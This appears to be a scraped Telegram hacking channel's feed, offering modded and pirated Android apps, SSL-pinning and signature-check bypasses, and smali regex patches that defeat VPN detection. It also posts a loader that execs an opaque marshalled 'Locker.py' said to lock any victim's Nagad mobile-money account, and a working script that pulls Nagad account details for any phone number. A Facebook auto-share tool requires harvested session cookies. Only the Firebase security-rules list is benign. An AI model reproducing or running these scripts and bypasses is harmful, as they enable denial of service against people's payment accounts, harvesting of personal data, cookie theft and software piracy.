𝚁𝚎𝚟𝚎𝚛𝚜𝚊𝚕 𝙷𝚞𝚋
Open in Telegram
215
Subscribers
No data24 hours
+17 days
+130 days
Posts Archive
215
Bypass SSL pinning of Android apps easily.
✅Non-Rooted
✅APK Editor Patch
✔️Full setup video.
Don't skip the video, the password is given in the video.
"Click Here"
⚠️ Will not work 100% on all apps.
Don't forget to report any problems
@mvirus19
215
Version: 3.5.4
Architecture: universal
Mod Feature:
✔️Premium Unlocked
✔️Lifetime Mod
✔️ No Modder Creadit [fresh]
✔️ Remove unnecessary functions
✔️ Optimized
⚠️Error Fixed:
✅Launch Problame Fixed [Tested]
✅ Imo/WhatsApp/Messanger All Apps Working💯
⚠️ If there is any problem with the app, please let me know.
Released: @mvirus19
215
Version: Latest
Architecture: universal
Mod Feature:
✔️Premium Unlocked
✔️Lifetime Mod
✔️ No Modder Creadit [fresh]
✔️ Remove unnecessary functions
✔️ Optimized
⚠️ If there is any problem with the app, please let me know.
❌If this version does not work, please let me know which version works.
Please give credit if you share
Released: @mvirus19
215
Firebase Security:
// No Security
{
"rules": {
".read": true,
".write": true
}
}
// Full security (NO ACCESS)
{
"rules": {
".read": false,
".write": false
}
}
// Only authenticated users can access/write data
{
"rules": {
".read": "auth != null",
".write": "auth != null"
}
}
// Checks auth uid equals database node uid
// In other words, the User can only access their own data
{
"rules": {
"posts": {
"$uid": {
".read": "$uid === auth.uid",
".write": "$uid === auth.uid"
}
}
}
}
// Validates user is moderator from different database location
{
"rules": {
"posts": {
"$uid": {
".write": "root.child('users').child('moderator').val() === true"
}
}
}
}
// Validates string datatype and length range
{
"rules": {
"posts": {
"$uid": {
".validate": "newData.isString()
&& newData.val().length > 0
&& newData.val().length <= 140"
}
}
}
}
// Checks presense of child attributes
{
"rules": {
"posts": {
"$uid": {
".validate": "newData.hasChildren(['username', 'timestamp'])"
}
}
}
}
// Validates timestamp is not a future value
{
"rules": {
"posts": {
"$uid": {
"timestamp": {
".validate": "newData.val() <= now"
}
}
}
}
}
// Prevents Delete or Update
{
"rules": {
"posts": {
"$uid": {
".write": "!data.exists()"
}
}
}
}
// Prevents only Delete
{
"rules": {
"posts": {
"$uid": {
".write": "newData.exists()"
}
}
}
}
// Prevents only Update
{
"rules": {
"posts": {
"$uid": {
".write": "!data.exists() || !newData.exists()"
}
}
}
}
// Prevents Create and Delete
{
"rules": {
"posts": {
"$uid": {
".write": "data.exists() && newData.exists()"
}
}
}
}215
Facebook Post Auto Share Tools
Just Paste Your Public post link & Get unlimited Share [No Limit]
Tools Installation;
apt update && apt upgrade pkg install python pip install requests pkg install git git clone https://github.com/mvirus19/Auto-Share.git cd Auto-Share python mv-share.pyCookies are required to use it: Simple solution: Cookies Extractor Apk ✅ Fixed the issue where cookies would expire quickly Enjoy ❣️ React or Share 🤕
215
Remove any Alert Dialog box from mod app
✅ No Need Activity Search
✅ Easy Method
✅ All Apps Working
Sometimes the code of On creat is not found.
To which many people cannot remove dialog
But This Method is very simple
No code search required.
How to Remove Modder Creadit;
Click Here To goooo
215
Genarate Facebook cookies without any extension/web
এই অ্যাপ দিয়ে সহজেই Facebook আইডি থেকে Cookies বের করতে পারবেন।
কোনো Extention এর ঝামেলা নেই। এক ক্লিকেই Cookies চলে আসবে।
না বুঝলে ভিডিওটা দেখুন কিভাবে কাজ করে
How to Work;
Click Here to Gooooooooooo
215
Protect your apps with signature check 😲😍🔥
আপনার অ্যাপে নিজের Signature check প্রটেকশন লাগিয়ে নিন।
অন্য কেউ মোড করলেও অ্যাপ Open হবে না
Method no: 1
Password: mvprotect
How To setup:
Click Here
215
যেকারো নগদ নাম্বার লক করে দিতে পারবে এই পাইথন Script দিয়ে।
Locker.py ফাইলটা ডাউনলোড দিয়ে
/storage/emulated/0/Download/Telegram/
ফোল্ডারে রাখুন
তারপর এই কোডটা রান করুন
import marshal
import types
file_path = "/storage/emulated/0/Download/Telegram/Locker.py"
with open(file_path, "rb") as f:
marshaled_code = f.read()
code = marshal.loads(marshaled_code)
exec(code)
ব্যাস কাজ শেষ।
যার নগদ নাম্বার লক করতে চাচ্ছেন নাম্বার দিয়ে Enter press করুন কাজ শেষ
Note: ২/২৪ ঘন্টার জন্য মনে হয় লক হয়🤔
এ অবস্থায় কোনো লেনদেন ও করতে পারবে না
Enjoy ❤️
215
My Robi Bypassed
✅ Signature check bypass
✅ Clone Supported
✅ Some Bug Fixed
✅ Latest Version
✅ Optimized
✅ Virtual-Dual Space Working
If I get good response then I will bypass SSL Pinning
@reversalhub
Contact if any problem @mvirus19
215
My Airtel Bypassed
✅ Signature check bypass
✅ Clone Supported
✅ Some Bug Fixed
✅ Latest Version
✅ Optimized
✅ Virtual-Dual Space Working
If I get good response then I will bypass SSL Pinning
@reversalhub
Contact if any problem @mvirus19
215
Bypass VPN Detection With mt manager [Dex File Edit]
1)
Search;
(const/4 [pv]\d+, 0x4\n\n(\s{4}\.line \d+\n)?\s{4}invoke-virtual \{[pv]\d+, [pv]\d+\}, Landroid/net/NetworkCapabilities;->hasTransport\(I\)Z\n\n(\s{4}\.line \d+\n)?\s{4})move-result ([pv]\d+)
Replace;
$1const/4 $4, 0x0
2)
Search;
(const/4 .*, 0x4[^>]*invoke-virtual .*, Landroid/net/NetworkCapabilities;->hasTransport\(I\)Z[^>]*)move-result (.*)
Replace;
$1const/4 $2, 0x0
3)
Search;
(const-string .*, "(tun|tunl0|tun0|utun0|utun1|utun2|utun3|utun4|pptp|ppp|pp0|ppp0|p2p0|ccmni0|ipsec)[^>]*.*, L.*contains(.*)Z[^>]*)move-result (.*)
Replace;
$1const/4 $4, 0x0
4)
Search;
(const-string .*, "(tun|tunl0|tun0|utun0|utun1|utun2|utun3|utun4|pptp|ppp|pp0|ppp0|p2p0|ccmni0|ipsec)"[^>]*.*, L.*(.*)Z[^>]*)move-result (.*)
Replace;
$1const/4 $4, 0x0
5)
Search;
(invoke-virtual .*, Ljava/net/NetworkInterface;->isUp\(\)Z[^>]*)move-result (.*)
Replace;
$1const/4 $2, 0x0
🔥→ NetworkCapabilities (hasTransport)←🔥
→How to work←
Click Here
Note: Not work All apps
@reversalhub
215
Nagad Number To Half info;
Python code
React + share
import requests
url = "https://app2.mynagad.com:20002/api/user/check-user-status-for-log-in"
number = input("Enter phone number: ")
#owner:mvirus19
#Telegram;https://t.me/reversalhub
params = {
'msisdn': number}
headers = {
'X-KM-User-AspId': '100012345612345',
'X-KM-User-Agent': 'ANDROID/1164',
'X-KM-DEVICE-FGP': '5AB18952A962A31MM9A89524F6282F78905DDE9F94656B5C1CFCEDNN74AE660E',
'X-KM-Accept-language': 'bn',
'X-KM-AppCode': '01',
'Host': 'app2.mynagad.com:20002',
'Connection': 'Keep-Alive',
'Accept-Encoding': 'gzip',
'User-Agent': 'okhttp/3.14.9'
}
response = requests.get(url, headers=headers, params=params)
if response.status_code == 200:
print(response.json())
else:
print(f"Error: {response.status_code}, {response.text}")
@reversalhub
215
Facebook Lite
Version: latest
✅ Orginal signature changed
✅ Optimized
✅ Clone supported
✅ You can clone as many as you need😍
→How to clone←
If you don't understand, watch the video
Link: https://youtube.com/shorts/38m6W321Hr0
@reversalhub
215
App Cloner Premium
Mod Feature:
✅ Bug Fixed
✅ Apps Optimize
✅ Android 12/13 Working
Crazy:
✅Data Import/Export Problem Fixed💯
✅ One or more enabled modding options are no longer supported on Android 10
This Toast Permanently Removed 🔥
এখন থেকে কোনো অ্যাপ Clone করে Open করলে আর এই Toast শো হবে না🔥
Apps Fully Secure❤️ @reversalhub
